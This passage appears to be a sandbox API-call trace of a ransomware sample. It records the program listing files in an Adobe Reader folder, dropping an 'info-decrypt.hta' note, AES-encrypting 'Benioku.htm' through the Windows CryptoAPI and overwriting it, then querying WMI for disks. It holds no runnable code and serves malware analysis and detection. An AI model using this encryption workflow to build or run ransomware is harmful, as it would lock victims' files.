ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4090, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeK.htm", cAlternateFileName="")) returned 1 [0141.567] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4444, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMePOL.htm", cAlternateFileName="RECE99~1.HTM")) returned 1 [0141.567] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4318, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeRUM.htm", cAlternateFileName="README~4.HTM")) returned 1 [0141.568] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4872, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeRUS.htm", cAlternateFileName="README~3.HTM")) returned 1 [0141.568] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeSKY.htm", cAlternateFileName="README~2.HTM")) returned 1 [0141.568] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4995, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeUKR.htm", cAlternateFileName="README~1.HTM")) returned 1 [0141.568] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x833608a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x833608a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resource", cAlternateFileName="")) returned 1 [0141.568] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf66ca0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf66ca0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup Files", cAlternateFileName="SETUPF~1")) returned 1 [0141.568] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vigtigt.htm", cAlternateFileName="")) returned 1 [0141.569] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Viktig.htm", cAlternateFileName="")) returned 1 [0141.569] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4214, dwReserved0=0x0, dwReserved1=0x0, cFileName="Viktigt.htm", cAlternateFileName="")) returned 1 [0141.569] FindNextFileW (in: hFindFile=0xb7f690, lpFindFileData=0x8f6ed04 | out: lpFindFileData=0x8f6ed04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4214, dwReserved0=0x0, dwReserved1=0x0, cFileName="Viktigt.htm", cAlternateFileName="")) returned 0 [0141.569] FindClose (in: hFindFile=0xb7f690 | out: hFindFile=0xb7f690) returned 1 [0141.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ef8c) returned 1 [0141.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ef98) returned 1 [0141.569] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", lpFilePart=0x0) returned 0x34 [0141.569] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0141.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0141.569] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0141.570] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", lpFilePart=0x0) returned 0x34 [0141.570] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0141.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eddc) returned 1 [0141.570] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4dc [0141.570] GetFileType (hFile=0x4dc) returned 0x1 [0141.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6edd8) returned 1 [0141.570] GetFileType (hFile=0x4dc) returned 0x1 [0141.571] WriteFile (in: hFile=0x4dc, lpBuffer=0x37868c8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x8f6eea0, lpOverlapped=0x0 | out: lpBuffer=0x37868c8*, lpNumberOfBytesWritten=0x8f6eea0*=0x1000, lpOverlapped=0x0) returned 1 [0141.683] WriteFile (in: hFile=0x4dc, lpBuffer=0x37868c8*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x8f6ee74, lpOverlapped=0x0 | out: lpBuffer=0x37868c8*, lpNumberOfBytesWritten=0x8f6ee74*=0x55e, lpOverlapped=0x0) returned 1 [0141.684] CloseHandle (hObject=0x4dc) returned 1 [0141.684] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", lpFilePart=0x0) returned 0x34 [0141.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0141.684] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm"), fInfoLevelId=0x0, lpFileInformation=0x35878d0 | out: lpFileInformation=0x35878d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4268)) returned 1 [0142.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0142.095] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", lpFilePart=0x0) returned 0x34 [0142.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0142.095] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0142.095] GetFileType (hFile=0x4e0) returned 0x1 [0142.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0142.095] GetFileType (hFile=0x4e0) returned 0x1 [0142.095] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x4268 [0142.095] ReadFile (in: hFile=0x4e0, lpBuffer=0x367f878, nNumberOfBytesToRead=0x4268, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x367f878*, lpNumberOfBytesRead=0x8f6eedc*=0x4268, lpOverlapped=0x0) returned 1 [0142.098] CloseHandle (hObject=0x4e0) returned 1 [0142.098] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xb1dc90) returned 1 [0142.099] CryptGenRandom (in: hProv=0xb1dc90, dwLen=0x10, pbBuffer=0x3683e34 | out: pbBuffer=0x3683e34) returned 1 [0144.651] CryptImportKey (in: hProv=0xb1dc90, pbData=0x3709fb0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f590) returned 1 [0144.652] CryptContextAddRef (hProv=0xb1dc90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.652] CryptContextAddRef (hProv=0xb1dc90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.652] CryptDuplicateKey (in: hKey=0xb7f590, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7ef90) returned 1 [0144.652] CryptContextAddRef (hProv=0xb1dc90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.652] CryptSetKeyParam (hKey=0xb7ef90, dwParam=0x4, pbData=0x370a090*=0x1, dwFlags=0x0) returned 1 [0144.652] CryptSetKeyParam (hKey=0xb7ef90, dwParam=0x1, pbData=0x370a05c, dwFlags=0x0) returned 1 [0144.652] CryptEncrypt (in: hKey=0xb7ef90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x370a0a0*, pdwDataLen=0x8f6eea8*=0x4270, dwBufLen=0x4270 | out: pbData=0x370a0a0*, pdwDataLen=0x8f6eea8*=0x4270) returned 1 [0144.652] CryptEncrypt (in: hKey=0xb7ef90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x370e334*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x370e334*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0144.654] CryptDestroyKey (hKey=0xb7f590) returned 1 [0144.654] CryptReleaseContext (hProv=0xb1dc90, dwFlags=0x0) returned 1 [0144.654] CryptReleaseContext (hProv=0xb1dc90, dwFlags=0x0) returned 1 [0144.654] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", lpFilePart=0x0) returned 0x34 [0144.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0144.654] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d8 [0144.655] GetFileType (hFile=0x4d8) returned 0x1 [0144.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0144.655] GetFileType (hFile=0x4d8) returned 0x1 [0144.655] WriteFile (in: hFile=0x4d8, lpBuffer=0x370e9ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x370e9ec*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0144.656] CloseHandle (hObject=0x4d8) returned 1 [0144.662] CoTaskMemAlloc (cb=0x20c) returned 0xbefa60 [0144.662] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbefa60 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0144.662] CoTaskMemFree (pv=0xbefa60) [0144.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0144.662] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0144.662] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0144.663] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0144.663] IUnknown:Release (This=0xb51e34) returned 0x0 [0144.665] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6024970) returned 0x0 [0144.665] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024970, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0144.665] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024970, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6025990) returned 0x0 [0144.666] WbemDefPath:IUnknown:Release (This=0x6024970) returned 0x0 [0144.666] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025990, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6025990) returned 0x0 [0144.666] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025990, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0144.666] WbemDefPath:IUnknown:AddRef (This=0x6025990) returned 0x3 [0144.666] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025990, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0144.666] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025990, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0144.666] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025990, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0xbe24a0) returned 0x0 [0144.666] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe24a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0144.666] WbemDefPath:IUnknown:Release (This=0xbe24a0) returned 0x3 [0144.666] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0144.667] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0144.667] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025990, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0144.667] WbemDefPath:IUnknown:Release (This=0x6025990) returned 0x2 [0144.667] WbemDefPath:IUnknown:Release (This=0x6025990) returned 0x1 [0144.668] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0144.668] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0144.668] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025990, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6025990) returned 0x0 [0144.668] WbemDefPath:IUnknown:AddRef (This=0x6025990) returned 0x3 [0144.668] WbemDefPath:IUnknown:Release (This=0x6025990) returned 0x2 [0144.668] WbemDefPath:IWbemPath:SetText (This=0x6025990, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0144.668] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025990, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0144.668] WbemDefPath:IWbemPath:GetText (in: This=0x6025990, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0144.668] WbemDefPath:IWbemPath:GetText (in: This=0x6025990, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0144.668] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025990, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0144.668] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025990, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0144.668] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025990, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0144.668] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025990, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0144.668] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025990, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0144.668] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0144.669] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0144.669] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0144.669] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0144.669] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0144.669] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0144.669] IUnknown:Release (This=0xb51e34) returned 0x0 [0144.670] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6024950) returned 0x0 [0144.670] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024950, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0144.670] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024950, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6025920) returned 0x0 [0144.670] WbemDefPath:IUnknown:Release (This=0x6024950) returned 0x0 [0144.670] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025920, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, 